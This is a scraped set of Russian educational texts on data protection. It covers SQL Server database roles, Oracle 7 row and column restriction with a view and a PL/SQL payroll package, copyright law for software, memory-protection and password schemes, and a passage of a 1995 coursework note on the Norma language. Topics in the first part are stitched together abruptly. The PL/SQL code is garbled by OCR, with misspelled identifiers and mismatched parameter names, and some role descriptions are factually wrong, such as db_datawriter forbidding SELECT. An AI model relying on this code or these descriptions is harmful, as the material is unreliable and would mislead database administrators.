В SQL Server существует три типа ролей:
• заранее определенные роли;
• определяемые пользователем роли;
• неявные роли.
Заранее определенными являются стандартные роли уровня БД. Эти роли имеет каждая база данных SQL Server. Они позволяют легко и просто передавать обязанности.
Заранее определенные роли зависят от конкретной базы данных и не могут быть изменены. Ниже перечислены стандартные роли уровня базы данных.
db_owner — определяет полный доступ ко всем объектам базы данных, может удалять и воссоздавать объекты, а также присваивать объектные права другим пользователям. Охватывает все функции, перечисленные ниже для других стандартных ролей уровня базы данных;
db_accessadmin — осуществляет контроль за доступом к базе данных путем добавления или удаления пользователей в режимах аутентификации;
db_datareader — определяет полный доступ к выборке данных (с помощью оператора SELECT) из любой таблицы базы данных. Запрещает выполнение операторов INSERT, DELETE и UPDATE для любой таблицы БД;
db_datawriter — разрешает выполнять операторы INSERT, DELETE и UPDATE для любой таблицы базы данных. Запрещает выполнение оператора SELECT для любой таблицы базы данных;
db_ddladmin — дает возможность создавать, модифицировать и удалять объекты базы данных;
db_securityadmin — управляет системой безопасности базы данных, а также назначением объектных и командных разрешений и ролей для базы данных;
db_backupoperator — позволяет создавать резервные копии базы данных;
db_denydatareader — отказ в разрешении на выполнение оператора SELECT для всех таблиц базы данных. Позволяет пользователям изменять существующие структуры таблиц, но не позволяет создавать или удалять существующие таблицы;
db_denydatawriter — отказ в разрешении на выполнение операторов модификации данных (INSERT, DELETE и UPDATE) для любых таблиц базы данных;
public — автоматически назначаемая роль сразу после предоставления права доступа пользователя к БД.
Роли, определяемые пользователем, позволяют группировать пользователей и назначать каждой группе конкретную функцию безопасности.
Существуют два типа ролей уровня базы данных, определяемых пользователем:
• стандартная роль;
• роль уровня приложения.
Стандартная роль предоставляет зависящий от базы данных метод создания определяемых пользователем ролей. Самое распространенное назначение стандартной роли — логически сгруппировать пользователей в соответствии с их правами доступа. Например, в приложениях выделяют несколько типов уровней безопасности, ассоциируемых с тремя категориями пользователей. Опытный пользователь может выполнять в базе данных любые операции; обычный пользователь может модифицировать некоторые типы данных и обновлять данные; неквалифицированному пользователю обычно запрещается модифицировать любые типы данных.
Роль уровня приложения позволяет пользователю выполнять права некоторой роли. Когда пользователь принимает роль уровня приложения, он берет на себя выполнение новой роли и временно отказывается от всех других назначенных ему прав доступа к конкретной базе данных. Роль уровня приложения имеет смысл применять в среде, где пользователи делают запросы и модифицируют данные с помощью клиентского приложения.
Системный анализ - это применение системного подхода при обработке конкретной информации и принятию решений. Рассмотренные принципы системного подхода являются и принципами системного анализа.
Их дополняют следующие специфические принципы:
• анализ любого процесса принятия решения должен начинаться с выявления и четкой формулировки целей (желаемых результатов деятельности), которые часто определяются на основе рассмотрения системы более высокого уровня;
• необходимо рассматривать лишь те цели, вероятность достижения которых р>р0 за время t<t0, где/?0 и t0 - пороги осуществимости цели.
Данные специальные принципы предполагают некую системную стратегию анализа, требующую рассмотрения не только самой системы, но и внешней по отношению к ней среды (надсистемы или метасистемы), и определение границы между ними.
Перспективой развития документальных информационно-поисковых систем и баз данных являются банки знаний, новая концепция информационной системы, использующая результаты исследований и разработок в области искусственного интеллекта.
Безопасность данных в Oracle 7
Ограничение доступа
Если мы уверены, что подключаться к нашей базе данных могут лишь уполномоченные пользователи и что они могут запускать только те модули, на выполнение которых им явно предоставлено право, то нужно подумать о следующем уровне безопасности — ограничении доступа этих пользователей к данным.
Огромным шагом вперед в обеспечении безопасности данных стало введение ролей в Oracle7. До Oracle7 каждому пользователю приходилось явно предоставлять права доступа к каждому объекту базы данных, который ему разрешено было использовать. Этот процесс упрощается за счет того, что доступ к совокупности объектов предоставляется роли, а затем право на использование этой роли предоставляется соответствующим лицам. С помощью команды GRANT мы можем предоставить пользователям право выполнять над объектами БД (например, над таблицами) операции SELECT, INSERT, UPDATE и DELETE. Однако само по себе это не обеспечивает значительной гибкости. Мы можем ограничить доступ пользователей частями таблицы, разделив ее по горизонтали (ограничив пользователя определенными строками), по вертикали (ограничив его определенными столбцами) или и по горизонтали, и по вертикали. Как это сделать?
Вернемся к нашему примеру с таблицей PAYROLL. Мы не хотим, чтобы все пользователи видели столбец SALARY, и желаем ограничить доступ пользователей так, чтобы они могли видеть только записи о сотрудниках их отдела.
Таблица PAYROLL
ID
NAME
DEFT
PAYMENT_PERIOD
SALARY
1
JONES
10
WEEKLY
120
2
K1RKUP
10
MONTHLY
900
3
DAVIES
10
WEEKLY
150
4
ARMSTRONG
20
MONTHLY
1030
5
KEMP
20
MONTHLY
1005
6
FISHER
30
WEEKLY
150
Мы можем определить представление и предоставить пользователям доступ к этому представлению, а не к базовой таблице (PAYROLL). Они смогут запрашивать данные этой таблицы лишь через представление, которое ограничивает их доступ. Определение такого представления приведено ниже.
CREATE VIEW vjpayroll AS SELECT id
, name , dept
, payment_period FROM payroll WHERE dept = (SELECT dept
FROM mysys_users WHERE username = USER) WITH CHECK OPTION;
Столбец SALARY в этом примере не включен в представление, поэтому зарплату в нем увидеть нельзя, а фраза WHERE гарантирует, что пользователи смогут запрашивать данные из таблицы PAYROLL только по своему отделу.
По поводу этого решения надо сказать следующее. Во-первых, мы должны сделать так, чтобы пользователи не могли изменить свой отдел, обновив значение MYSYSJUSERS, и затем запросить записи из другого отдела. Во-вторых, с помощью этого представления пользователи могли бы обновлять, вставлять и удалять даже не относящиеся к их отделу строки таблицы PAYROLL, если бы мы не отключили эту функцию с помощью фразы WITH CHECK OPTION.
Примечание
Вряд ли представление V_PAYROLL будет обновляемым, потому что к столбцу SALARY почти наверняка применено ограничение NOT NULL. Тем не менее, мы рекомендуем использовать опцию WITH CHECK OPTION во всех ограничивающих представлениях, так как в версии 7.3 значительно увеличилось число обновляемых представлений.
Ограничение на просмотр данных с помощью представлений работает очень хорошо. Но для большой таблицы со сложными требованиями к безопасности, возможно, придется создать несколько представлений и заставить приложения решать, какое из них необходимо для конкретного пользователя. Реализовывать это внутри приложения нежелательно, поэтому нужно исследовать другие решения. Мы можем инкапсулировать все операции над таблицей PAYROLL в хранимый пакет или же разработать несколько триггеров. Давайте рассмотрим первое решение.
Использование пакетов
В пакете есть методы (процедуры/функции), позволяющие оперировать таблицей или запрашивать из нее строки. Пользователю, у которого есть разрешение на выполнение пакета, но нет полномочий на доступ к таблице, содержимое и структура таблицы непосредственно недоступны. Владелец пакета имеет полный доступ к PAYROLL, а вызывающий пользователь — нет. Когда пользователь выполняет хранимую процедуру, т.е., по сути, использует представление, он действует с разрешением на доступ, предоставленным ее владельцу.
Наша первая попытка создать такой пакет представлена в примере 10.2. Пакет k_payroll гарантирует, что записи могут удаляться только начальником отдела и что устанавливать значение столбца SALARY может только начальник отдела.
Пример построения пакета для обеспечения безопасности доступа к данным
CREATE OR REPLACE PACKAGE k_payroll AS my_dept payroll.dept%TYPE; mgr BOOLEAN;
PROCEDURE del (p_emp_id INTEGER);
PROCEDURE ins (p_emp_id INTEGER, p_name VARCHAR2
,p_dept INTEGER, p_payment_period VARCHAR2
,p_salary INTEGER);
PROCEDURE upd (p_emp__id INTEGER, p_name VARCHAR2
,p_payment_penod VARCHAR2 ,p_salary INTEGER);
END k_payroll;
/
CREATE OR REPLACE PACKAGE BODY k_payroll AS
mgr_flag payroll.mgr_flag%TYPE;
CURSOR c_me IS
SELECT dept,
mgr_flag
FROM mysys_users
WHERE username = USER;
FUNCTION checkdept (p_emp_id INTEGER) RETURN BOOLEAN IS
dept payroll.dept%TYPE;
CURSOR cjpayroll IS
SELECT pay.dept
FROM payroll pay
WHERE id = p_emp_id;
BEGIN
OPEN c_payroll ;
FETCH cjpayroll INTO dept;
CLOSE c_payroll;
IF dept <> my_dept THEN
RETURN FALSE;
END IF;
RETURN TRUE;
END checkdept;
PROCEDURE del (p_emp_id INTEGER) IS
Удалять сотрудников могут только начальники их отделов
Записи таблицы Payroll
BEGIN
IF checkdept(p_emp_id) AND mgr THEN
DELETE payroll
WHERE id = p_emp_id;
ELSE
raise_application_error (-20001, 'Insufficient Privilege'); END IF;
END del;
PROCEDURE ins (p_emp_id INTEGER, p_name VARCHAR2
,p—dept INTEGER
,payment_period VARCHAR2
,p_salary INTEGER) IS
— Можете вставлять записи Payroll только в свой отдел
~ Устанавливать зарплату может только начальник отдела
(в противном случае устанавливается в пустое значение)
l_salary payroll.salary%TYPE;
BEGIN
IF NOT checkdept(p_emp_id) THEN
raise_application_error (-20001, 'Insufficient Privilege');
END IF;
IF NOT mgr THEN
l_salary := NULL;
ELSE
l_salary := p_salary;
END IF;
INSERT INTO payroll (id,name,dept,payment_period, salary)
VALUES (p_erap_id,p_name,p_dept,p_payraent_period,l_salary);
END ins;
PROCEDURE upd (p_emp_id INTEGER, p_name VARCHAR2
,p_payment_period VARCHAR2 ,p_salary INTEGER) IS
- Можете обновлять записи Payroll только в своем отделе
- Обновлять зарплату может только начальник отдела
(в противном случае остается без изменений)
- Отдел изменять нельзя
l_salary payroll.salary%TYPE;
CURSOR c_old_salary IS
SELECT pay.salary
FROM payroll pay
WHERE id = p_erap_id;
BEGIN
IF NOT checkdept (p_emp_id) THEN
raise applicatiori_error (-20001, 'Insufficient Privilege');
END IF;
IF NOT mgr THEN
OPEN c_old_salary;
FETCH c__old_s alary INTO l__salary;
CLOSE c_old_salary,
ELSE
l_salary := p_salary;
END IF;
UPDATE payroll
SET name = p_name
,payment_period = p_payment_period
,salary = l_salary
WHERE id = p_emp_id;
END upd;
-Код инициализации пакета
BEGIN
OPEN c_me;
FETCH c_me
INTO ray_dept
,mgr_flag;
CLOSE c_me;
IF mgr_flag = 'Y' THEN
mgr := TRUE;
ELSE
mgr := FALSE;
END IF;
END k_payroll;
/
Юридическая защита авторских прав на базы данных
Вопросы правовой защиты программ для ЭВМ и базы данных от незаконного использования являются очень актуальными в настоящий момент. Для иллюстрации этого приведем несколько фактов. По данным Ассоциации производителей компьютерного обеспечения, уровень компьютерного пиратства в России составляет 94%. Уровень пиратства в странах Запада существенно ниже: в Германии - 50%, в США - 35%. По данным МВД РФ, потери российского бюджета от неуплаты налогов продавцами компьютерных программ составляют 85 млн. долл. Деньги, полученные от продажи, часто уходят в распоряжение криминальных структур. Кроме того, 105 млн. долл. теряют российские предприятия. В области разработки компьютерных программ и баз данных в стране работает около шести тысяч фирм, обеспечивающих занятость более 200 тыс. человек. Данной сфере производства грозит стагнация - программисты попросту теряют стимулы к созданию новых передовых программных продуктов.
Признание права – первый из перечисленных в п. 1 ст. 18 Закона РФ «О правовой охране программ для ЭВМ и баз данных» способов защиты авторских прав. Этот способ защиты играет в основном превентивную роль и служит установлению определенности во взаимоотношениях субъектов гражданского права. Признание права как способ защиты применяется, когда оспаривается или отрицается принадлежность определенному лицу исключительных авторских прав на программу для ЭВМ или базу данных. Признание права как средство его защиты может быть реализовано лишь в судебном порядке путем подтверждения наличия или отсутствия у лица отдельных авторских правомочий или их совокупности.
П. 1 ст. 17 Закона РФ «О правовой охране программ для ЭВМ и баз данных» определяет нарушителя авторского права как физическое или юридическое лицо, которое не выполняет требований настоящего закона в отношении исключительных прав правообладателей, в том числе ввозит в Российскую Федерацию экземпляры программы для ЭВМ или базы данных, изготовленные без разрешения их правообладателя. Это может выражаться в присвоении авторства, осуществлении перечисленных в ст. 10 Закона РФ «О правовой охране программ для ЭВМ и баз данных» действий без разрешения правообладателя и т. д. Отдельное выделение импорта экземпляров программы для ЭВМ или базы данных, изготовленных без разрешения их правообладателей объясняется тем, что в государстве, где данные экземпляры были изготовлены, это действие может считаться законным и не влекущим ответственности.
Заключение
Информационная безопасность относится к числу дисциплин, развивающихся чрезвычайно быстрыми темпами. Этому способствуют как общий прогресс информационных технологий, так и постоянное противоборство нападающих и защищающихся.
К сожалению, подобная динамичность объективно затрудняет обеспечение надежной защиты. Причин тому несколько:
• повышение быстродействия микросхем, развитие архитектур с высокой степенью параллелизма позволяет методом грубой силы (перебором вариантов) преодолевать барьеры (прежде всего криптографические), ранее казавшиеся неприступными;
• развитие сетей, увеличение числа связей между информационными системами, рост пропускной способности каналов расширяют число потенциальных злоумышленников, имеющих техническую возможность осуществить нападение;
• появление новых информационных сервисов ведет и к появлению новых угроз как «внутри» сервисов, так и на их стыках;
• конкуренция среди производителей программного обеспечения заставляет сокращать сроки разработки системы, что ведет к снижению качества тестирования и выпуску продуктов с дефектами защиты;
• навязываемая потребителям парадигма постоянного наращивания аппаратного и программного обеспечения вступает в конфликт с бюджетными ограничениями, из-за чего снижается доля ассигнований на безопасность.
Обеспечение информационной безопасности современных информационных систем требует комплексного подхода. Оно невозможно без применения широкого спектра защитных средств, объединенных в продуманную архитектуру. Далеко не все эти средства получили распространение в России, некоторые из них даже в мировом масштабе находятся в стадии становления.
В этих условиях позиция по отношению к информационной безопасности должна быть особенно динамичной. Теоретические воззрения, стандарты, сложившиеся порядки необходимо постоянно сверять с требованиями практики. От атак не защититься книгой (даже оранжевой) или сертификатом. Реальная безопасность нуждается в каждодневной работе всех заинтересованных сторон.
Список литературы
Голицына О.Л., Максимов Н.В. и др., «Базы данных» (учебное пособие)
Могилёв А.В., Пак Н.И. и др., «Информатика»
Изюмин В.П. «Пиратство в сфере программного обеспечения» // Финансовые известия от 23 мая 2003 г.
Статья Юрия Шермана // www.tour-soft.com
Статья Сергея Гаврилова // [email protected]
Партыка Т.Л., Попов И.И. «Информационная безопасность», М.: Форум: инфра – м, 2004 г.
Герасименко В.А., Малюк А.А., «Основы защиты информации» М.: МИФИ, 2001 г. |
https://doc4web.ru/informatika/zaschita-informacii1.html | Защита информации | https://doc4web.ru/uploads/files/100/66b9ce2c39dd04ef5343998d39e5f623.docx | files/66b9ce2c39dd04ef5343998d39e5f623.docx | Защита информации
На современном этапе развития АСУ все большее значение приобретает защита информации, что связано, главным образом, с увеличением объемов данных, к которым одновременно обращается для решения различных задач большое число пользователей.
Это приводит к повышению уязвимости информации, под которой понимают возможность ее несанкционированного использования, искажения или уничтожения в результате доступа пользователей, не обладающих специальными полномочиями, к конфиденциальным сведениям. Для уменьшения вероятности несанкционированного использования информации разрабатывают специальные механизмы ее защиты.
Серийно выпускаемая вычислительная техника имеет некоторые встроенные аппаратные и программные средства защиты. Так, например, многие ЭВМ оснащают специальными аппаратными средствами, позволяющими изолировать пользователей друг от друга и от операционной системы, что обеспечивает возможность эффективного контроля операций по выборке и посылке на хранение данных и уменьшает возможность несанкционированного доступа.
Предусматривают специальные средства центрального процессора для обеспечения безопасности информации, в том числе программно-читаемые часы для регистрации времени свершения тех или иных событий; программно-читаемый закрепленный в памяти аппаратными средствами код идентификации, различный для каждого центрального процессора; инструкции по очистке блока памяти внесением нулей; использование только специфицированных кодов операций и т.п.
Чтобы не допустить искажения или потери информации, предусмотрена система защиты памяти при записи и считывании информации.
Наиболее важной является защита при записи, однако в отдельных случаях необходимо знать, какая программа сделала попытку считать данные или исполнить команду из запрещенной для нее зоны. Попытка нарушить защиту памяти вызывает прерывание программы-нарушителя. Обычно используют несколько способов организации защиты памяти. Часто встречается защита двумя регистрами, называемыми граничными или регистрами защиты и содержащими номера нижнего и верхнего граничных блоков сегмента.
При появлении команды записи по некоторому адресу он последовательно сравнивается с граничными регистрами. Если требуемый адрес находится за пределами сегмента, указанного нижним и верхним регистрами, то возникает прерывание и после установления его причины управление передается специальной программе, обрабатывающей нарушения защиты памяти.
Установку значений указанных регистров при работе ЭВМ в режиме разделения времени провопит специальная управляющая программа-супервизор.
Аналогично функционирует система защиты с тремя регистрами. Третий регистр устанавливает, распространяется ли защита на внутреннюю область, определяемую верхним и нижним регистрами (состояние 0), или внешнюю (состояние 1).
В настоящее время развивается тенденция хранить программы в оперативной памяти не целиком, а составленными из отдельных сегментов. Для защиты этих сегментов можно использовать несколько пар регистров защиты, подобных описанным выше.
Однако с ростом числа регистров растет число выполняемых логических операций, что усложняет схемную реализацию механизма защиты и может вызвать существенное снижение быстродействия ЭВМ.
Достаточно широко используют метод защиты оперативной памяти по ключу. Память разбивают на блоки, каждому из которых ставится в соответствие некоторый ключ.
Условия выполнения программы запоминаются в слове памяти, называемом словом состояния программы. Супервизор помещает в это слово ключ защиты программы. Кроме того, в это же слово записывают первые позиции ключей каждого блока памяти, используемых текущей программой.
При появлении адреса из некоторого блока памяти сравнивается ключ защиты в слове состояния программы и первые разряды ключа этого блока памяти. Несовпадение свидетельствует о попытке нарушения защиты и вызывает прерывание.
В системах, работающих в режиме разделения времени, функции защиты возлагают на трансляторы, что накладывает определенные ограничения на языки программирования, так как трансляторы должны до исполнения программ осуществить контроль.
Этот метод часто используют для работы с языками, близкими к естественным. В этом случае символическим идентификаторам соответствует определенный адрес памяти (ячейка памяти, например, получившая обозначение А, всегда будет находиться по адресу А' для первого пользователя, по адресу А" для второго и т.д., что упрощает контроль при трансляции).
Несмотря на широкое использование серийных средств защиты данных в ЭВМ, они не обеспечивают надежное перекрытие всех потенциально возможных каналов несанкционированного использования или утечки информации, что диктует необходимость разработки механизмов защиты при проектировании АСУ.
Одна из основных их характеристик - вероятность "взлома", в результате которого будет нарушена безопасность информации, т.е. произойдет либо несанкционированное использование, либо разрушение (искажение или стирание) отдельных элементов или всех данных.
Выбор механизмов защиты определяется особенностями рассматриваемой СОД, критериями синтезируемой системы защиты, используемыми методами защиты, имеющимися ресурсами и т.д. Существующие методы и механизмы защиты включают в себя процедурные, программные и аппаратные способы организации защиты.
Процедурные методы защиты обеспечивают доступ к данным только тем пользователям, которые имеют соответствующие разрешения. Например, для систем с разделением времени процедурные методы защиты должны обеспечивать контроль доступа со стороны пользователей, использующих терминалы ввода–вывода.
Идентификация осуществляется путем проверки паролей терминалов, кодов пользователей, шифров работ и посылки обратного сигнала об их законности.
Реализация процедурных методов защиты обеспечивается установлением паролей для терминалов, грифов секретности данных, созданием организационных и физических ограничений (сейфы, вахтеры, охрана и т д.), а повышение их эффективности достигается путем соответствующего обучения и повышения уровня ответственности персонала.
Ответственность за нарушение безопасности данных при этом возлагается на группу лиц, в обязанности которых входят:
управление доступом к данным;
учет попыток несанкционированного доступа к защищенным данным;
регистрация лиц, имеющих копии данных ограниченного использования;
анализ функционирования системы защиты и повышение качества ее работы;
анализ последствий, вызванных "взломом" системы защиты.
Процедурные методы защиты используют в основном на этапах первичной обработки данных и выдачи результатов обработки пользователям.
Программные и аппаратные методы защиты используют в основном на этапе обработки данных на ЭВМ. Они обеспечивают: обслуживание только "законных" пользователей; доступ к объектам защиты в соответствии с установленными правами и правилами; возможность изменения (модификации) правил взаимодействия между пользователями и объектами защиты; возможность получения -информации о безопасности объектов защиты.
Некоторые программные методы обеспечивают возможность анализа функционирования системы защиты с целью повышения качества ее работы и анализа последствий, вызванных "взломом".
Структура и характеристики аппаратных и программных методов защиты зависят от характеристик процессора и структуры памяти. С точки зрения взаимодействия пользователей в системе защита обеспечивает одну из следующих альтернатив: взаимную изоляцию данных пользователей и наличие библиотеки общего пользования; некоторые данные могут использоваться и (или) изменяться рядом пользователей, что контролируется механизмом защиты; удовлетворение специфических требований пользователей в доступе к объектам защиты, что обеспечивается программируемыми механизмами защиты.
Упрощенным представлением организации защиты является следующая модель: "Каждый объект защиты окружен непроницаемым барьером с единственным проходом, у которого поставлен охранник".
Функцией охранника является проверка полномочий пользователей, которая осуществляется следующим образом: полномочия пользователя удостоверяются, если совпадает пароль, которым располагает охранник, и пароль, сообщенный пользователем.
Рассмотрим некоторые методы защиты для режима прямого доступа.
1. Помещения, где находятся терминалы, запирают. Доступ к ресурсам вычислительного комплекса имеют пользователи, которые обладают ключами.
2. Доступ к терминалам разрешается в случае предъявления соответствующего пропуска вахтеру.
3. Каждый терминал имеет список пользователей, которым разрешен доступ с этого терминала к ресурсам вычислительного комплекса. Пользователь сообщает системе свой код (пароль), который сверяется со списком. Если пароли совпадают, доступ разрешается.
4. Для каждого пользователя, код которого помещен в список, указывается временной интервал, в течение которого он имеет право обращаться к системе. В этом случае для доступа необходимо знать не только код пользователя, но и разрешенный ему временной интервал.
5. Пользователь начинает работу с терминалом, вводя свое имя "открытым текстом". По каналу связи имя передается в ЭВМ, где в защищенной таблице отыскивается соответствующий засекреченный ключ шифра.
Этот ключ передается шифровальному устройству, входящему в состав ЭВМ, после чего на терминал посылается подтверждение о готовности. Тем временем пользователь вводит этот же ключ в свой терминал. Если ключи совпадают, то сеанс связи продолжается.
6. Если пароль пользователя не может быть сохранен в тайне, он должен быть только однократным.
В этом случае пользователь ведет список паролей, вычеркивая из него уже использованные. В других случаях применяется контроль срока действия или общего числа применений конкретного пароля.
7. Список паролей пользователей в системе должен быть надежно защищен. Например, все оригиналы паролей при вводе подвергаются преобразованию Н.
Таким образом, в системе хранится список не оригиналов, а отображений паролей пользователей.
Преобразование Н должно быть плохо обращаемым, т.е. возможность найти значение пароля по его отображению должна быть минимальной. Пользователь, обращаясь к системе, предъявляет свой пароль, который преобразуется и сверяется со списком отображении.
Совпадение свидетельствует о законности обращения пользователя. Засекреченным должен быть только пароль, а список отображений может и не быть засекреченным, поскольку практически невозможно получить пароль по его отображению.
8. Набор данных может быть защищен установлением для него списка пользователей, имеющих право доступа к этому набору.
9. Кроме списка пользователей можно указывать и типы доступа (чтение, запись, редактирование), которые разрешены конкретному пользователю в отношении этого набора данных.
10. Если набор состоит из неоднородных (в смысле защиты) данных, то для каждого типа данных устанавливается список пользователей и указывается, какие виды доступа разрешены каждому пользователю.
В процессе разработки системы в первую очередь должны быть определены требования к защите информации.
Они заключаются в том, что всю информацию по ее смысловому содержанию делят на группы различного уровня защиты, доступные: всем пользователям для чтения и обновления; всем для чтения и определенным категориям пользователей для обновления; определенным группам пользователей только для чтения и другим для чтения и обновления; определенным группам пользователей только для чтения и в индивидуальном порядке для чтения и обновления; в индивидуальном порядке для чтения и обновления. Отнесение информации к той или иной группе секретности определяется тем, какой ущерб может быть нанесен системе при ее несанкционированном использовании.
Во всех случаях введения тех или иных методов защиты должны быть разработаны организационные меры, предусматривающие функционирование защиты, в частности хранение и смену паролей. С одной стороны, должна быть обеспечена "защита защиты" – например, невозможность кому-либо узнать пароль пользователя, в том числе сотрудникам ВЦ и эксплуатационному персоналу АСУ.
С другой стороны, надо помнить о возможности такой ситуации, когда пользователь забыл или утерял свой пароль. В первом случае надо предусмотреть процедуру восстановления права пользователя на доступ к данным по старому или новому паролю. Во втором случае надо надежно "закрыть" данные, чтобы ими не могло воспользоваться лицо, нашедшее пароль.
Для маскировки наличия защиты может использоваться метод правдоподобных ответов. Он заключается в том, что лицу, обратившемуся с запросом к неразрешенным для него сведениям, выдается ответ, внешне совпадающий с запрашиваемым, но содержание заполняется случайным образом.
Этот метод достаточно эффективен, так как не провоцирует на новые попытки "взлома" защиты. Недостаток метода заключается в том, что лица, имеющие право доступа, но обращающиеся с паролями небрежно, могут получить неверные сведения и, не подозревая об этом, использовать их в своей деятельности.
Обычно эффективными являются "открытые" методы защиты, когда сам метод не представляет секрета, но воспользоваться им постороннему лицу невозможно.
Задачи синтеза систем защиты состоят в выборе совокупности методов защиты, обеспечивающей экстремальное значение определенной характеристики системы защиты при ограничениях на ряд других характеристик.
В постановках задач синтеза систем защиты в качестве ограничивающих факторов и показателей эффективности защиты выступают стоимостные и временные затраты на разработку и эксплуатацию методов защиты, потери от "взлома" системы защиты, вероятность и среднее время несанкционированного доступа к объектам защиты.
Исходной информацией для постановки и решения задач синтеза являются следующие данные:
W - множество объектов защиты;
LW – число структурных уровней защиты, которое необходимо последовательно преодолеть при доступе к объекту w;
характеристики k-го метода зашиты, 1 ≤ k ≤ kl, использование которого возможно на l-м структурном уровне, т.е. qkl(w) – вероятность "взлома" (преодоления) l-го структурного уровня защиты объекта w при условии "взлома" предшествующих уровней;
и – стоимостные затраты соответственно на разработку и эксплуатацию;
и - временные затраты соответственно на разработку и эксплуатацию;
dkl(w) – потери в системе, вызванные преодолением ограничений рассматриваемого метода защиты;
tkl(w) - время одной попытки несанкционированного доступа.
Переменные: xkl(w) = 1, если k-й метод зашиты, относящийся к l-му уровню, закреплен за объектом w и xkl(w) = 0, в противном случае , 1 ≤ l ≤ LW, 1 ≤ k ≤ kl.
Задача выбора оптимальной совокупности методов зашиты, обеспечивающей максимальное среднее время несанкционированного доступа, записывается в виде
при ограничениях:
на структуру зашиты
на вероятность несанкционированного доступа по структурным уровням и объектам защиты
где ql(w) - допустимое значение вероятности несанкционированного доступа для l-го уровня и объекта w;
по стоимостным затратам на проектирование и эксплуатацию системы защиты
где СП, СЭ - выделяемые ресурсы на проектирование и эксплуатацию системы защиты;
по временным затратам на проектирование и эксплуатацию системы защиты
где ТП, ТЭ - допустимые временные затраты на проектирование и эксплуатацию
системы защиты;
на потери от "взлома" защиты
где D - допустимые суммарные потери от "взлома" зашиты.
Решение рассмотренной задачи линейного целочисленного программирования с булевыми переменными осуществляется методом "ветвей и границ" с использованием стандартных программных средств. Для сокращения размерности решаемой задачи целесообразно выделять подмножества идентичных (в смысле зашиты) объектов и производить выбор методов защиты для "представителей" этих подмножеств.
Синтез динамических систем защиты осуществляется аналогично. |
https://doc4web.ru/informatika/yazik-programmirovaniya-norma.html | Язык программирования Норма | https://doc4web.ru/uploads/files/181/599f1dc49d8f9a9c8db4a668410f8e24.docx | files/599f1dc49d8f9a9c8db4a668410f8e24.docx | МОСКОВСКИЙ ГОСУДАРСТВЕННЫЙ ИНЖЕНЕРНО-ФИЗИЧЕСКИЙ ИНСТИТУТ
(ТЕХНИЧЕСКИЙ УНИВЕРСИТЕТ)
--------------------------------------------------------
Кафедра 22
Пояснительная записка к
КУРСОВОЙ РАБОТЕ
на тему
"Работа с таблицами общего пользования
на этапе лексического анализа языка Норма"
студента группы К7-02а
Жучкова Александра Викторовича
Научный руководитель:
Комиссия:
Оценка:
Москва 1995г.
1. ВВЕДЕНИЕ
Задание, полученное мной на УИР и КП в данном семестре состояло
в следующем:
- ознакомиться с языком программирования Норма и изучить его;
- изучить структуру транслятора с языка программирования Норма;
- ознакомление с языком пограммирования РЕФАЛ;
- разработать структуру данных для реализации работы с таблицами
общего пользования;
- написать функции работы стаблицами.
2. Общее описание языка Норма
Язык программирования Норма является декларативным (непроцедурным)
языком и предназначен для спецификации численных методов решения задач
математической физики. Изначально он был ориентирован на решение задач
математической физики разностными методами, однако может быть использован
для решения более широкого класса вычислительных задач.
Типичный процесс решения задачи из области математической физики
состоит из следующих этапов.
1. Постановка задачи. Выходом этого этапа является обычно система
дифференциальных уравнений, описывающих задачу.
2. Выбор пространственно-временной сетки и дискретизация уравнений с
помощью одного из разностных методов.
3. Выбор метода решения дискретных уравнений. В результате получаются
формулы (соотношения), описывающийе необходимые вычисления в узлах сетки.
4. Программирование полученных формул на некотором языке, который
обеспечивает решение задачи на вычислительной машине.
Главная идея, положенная в основу языка Норма, заключается в том,
что полученные специалистом в процессе решения прикладной задачи расчетные
формулы почти непосредственно используются для ввода в вычислительную систему
и проведения счета.Таким образом, язык Норма дает прикладному математику
возможность сформулировать свою задачу в привычных для него терминах.
Организация процесса вычислений с учетом архитектуры ЭВМ (возможностей
параллельной, векторной обработки и т. п.) - зто задача транслятора с языка
Норма.
Существенным фактом является возможность реализации одной программы
на языке Норма различными вычислительными процессами. Именно разработка
алгоритма с характеристиками, близкими к оптимальным и эффективно
учитывающими особенности конкретных ЭВМ, является наиболее узким местом
создания высококачественного программного обеспечения.
Запись на языке Норма - это, по существу, строгая запись численных
методов решения математической задачи, запись еще не алгоритмов, а просто
расчетных формул и остальной необходимой информации, которую необходимо
знать, чтобы написать программу для ЭВМ.
Отметим, что в записи на Норме не требуется никакой информации о
порядке счета, способах организации вычислительных (циклических) процессов.
Порядок предложений языка может быть произвольным - информационные
взаимосвязи будут выявлены и учтены при организации процесса счета
транслятором.
Выбор уровня языка Норма определяет характерную его черту - в этом
языке нет необходимости вводить такие понятия, как оператор присваивания и
возможность переприсваивания значений (типа х:=х+1) и операторы перехода.
Наличие таких понятий в традиционных языках программирования объясняется
необходимостью формулировки конкретного алгоритма с учетом вопросов
экономии и распределения памяти, порядка выполнения операторов и т. п.
Побочный эффект в языке Норма отсутствует по определению.
Понятно, что многие из этих вопросов появляются снова на этапе синтеза
рабочей программы. Однако, здесь они решаются автоматически по строгим
правилам, гарантирующим правильность синтезируемой программы.
Непроцедурность языка Норма позволяет преодолеть еще одну трудность,
связанную с распараллеливанием алгоритма при счете на ЭВМ, допускающих
совмещение операций. Известные методы распараллеливания последовательных
алгоритмов основаны на выявлении, при некоторых ограничениях, частей
алгоритма, которые можно выполнять независимо, в соответствии с заданным
критерием параллелизма - асинхронные вычисления, синхронные и т. п. Однако,
выявление взаимосвязей в уже сформированном последовательном алгоритме
является неестественной и трудной задачей, так как анализируемая
формулировка, как правило, насыщена избыточными взаимосвязями (типа введения
рабочих переменных для экономии памяти, конкретных способах организации
циклов и т. п.). Вообще говоря, ни откуда не следует, что последовательный
алгоритм надо транслировать в параллельный, а не определять параллельный
сразу по непроцедурной записи.
Эти свойства, и некоторые другие ограничения, позволяют строго
обосновать разрешимость синтеза выходной программы, так как в достаточно
общей постановке решение этой задачи приводит к значительным математическим
трудностям - она может оказаться NP-полной либо вообще неразрешимой. С
другой стороны, исследования, связанные с разработкой и применением языка
Норма показывают, что имеющиеся ограничения приемлимы с практической точки
зрения.
3 Структура транслятора с языка Норма.
Транслятор с языка программирования Норма уже написан на языке Рефал.
И хотя язык программиорвания Рефал весма удобен для обработки символьной
информации, транслятор написанный на этом языке очень не экономно использует
ресурсы вычислительной машины, а именно оперативную память, что зачастую
правильно написанную программы невозможно оттранслировать из за нехватки
оперативной памяти. Поэтому было решено перевести транслятор с языка
программирования Норма на язык программирования Си, который был выбран по
следующим причинам:
- язык Си позволяет гораздо более эффективно использовать ресурсы
вычислительной машины;
- язык Си универсален и удобен для решения задач системного
программирования - разработке трансляторов, операционных систем, экранных
интерфейсов, инструментальных средств;
